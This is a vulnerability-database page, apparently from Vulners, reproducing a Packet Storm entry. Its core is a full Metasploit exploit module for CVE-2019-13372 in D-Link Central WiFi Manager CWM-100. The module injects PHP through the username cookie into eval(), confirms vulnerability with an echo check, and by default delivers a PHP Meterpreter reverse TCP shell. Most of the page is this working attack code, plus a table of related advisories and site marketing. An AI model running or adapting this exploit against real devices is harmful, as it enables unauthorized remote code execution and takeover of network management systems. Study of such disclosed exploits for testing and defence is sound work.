Vulners
Lucene search
D-Link Central WiFi Manager CWM(100) Remote Code Execution
🗓️ 18 Aug 2020 00:00:00Reported by M3 at ZionLabType 
packetstorm🔗 packetstormsecurity.com👁 261 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | D-Link Central WiFi Manager CWM(100) Remote Code Execution Exploit | 18 Aug 202000:00 | – | zdt |
 | CVE-2019-13372 | 7 Jul 201901:59 | – | circl |
 | D-Link Central WiFi Manager (CWM-100) Remote Code Execution Vulnerability | 8 Jul 201900:00 | – | cnvd |
 | D-Link Central WiFiManager CWM-100 Remote Code Execution (CVE-2019-13372) | 13 Nov 202200:00 | – | checkpoint_advisories |
 | CVE-2019-13372 | 6 Jul 201922:54 | – | cve |
 | CVE-2019-13372 | 6 Jul 201922:54 | – | cvelist |
 | D-Link Central WiFi Manager CWM(100) RCE | 18 Aug 202017:41 | – | metasploit |
 | D-Link Central WiFi Manager CWM(100) - Remote Code Execution | 1 Jun 202605:38 | – | nuclei |
 | CVE-2019-13372 | 6 Jul 201923:15 | – | nvd |
 | CVE-2019-13372 | 6 Jul 201923:15 | – | osv |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
'Description' => %q{
This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)
versions below `v1.03R0100_BETA6`. The vulnerability exists in the
username cookie, which is passed to `eval()` without being sanitized.
Dangerous functions are not disabled by default, which makes it possible
to get code execution on the target.
},
'License' => MSF_LICENSE,
'Author' =>
[
'M3@ZionLab from DBAppSecurity', # Original discovery
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
],
'References' =>
[
['CVE', '2019-13372'],
['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
],
'Targets' => [ [ 'Automatic', {}] ],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'SSL' => true,
'RPORT' => 443
},
'Platform' => %w[php],
'Arch' => [ ARCH_PHP ],
'DisclosureDate' => 'Jul 9 2019'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
]
)
end
def inject_php(cmd)
encode_char = ->(char) { '%' + char.ord.to_s(16).rjust(2, '0') }
payload = "',0,\"\",1,\"0\")%3b#{cmd.gsub(/[;\s]/, &encode_char)}%3b//\""
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),
'cookie' => "username=#{payload};password="
)
res ? res.body[/^(.*?)<!DOCTYPE html>/mi, 1] : nil
end
def check
rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))
if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Unknown
end
def exploit
inject_php(payload.raw)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2020 00:00Current
EPSS0.92907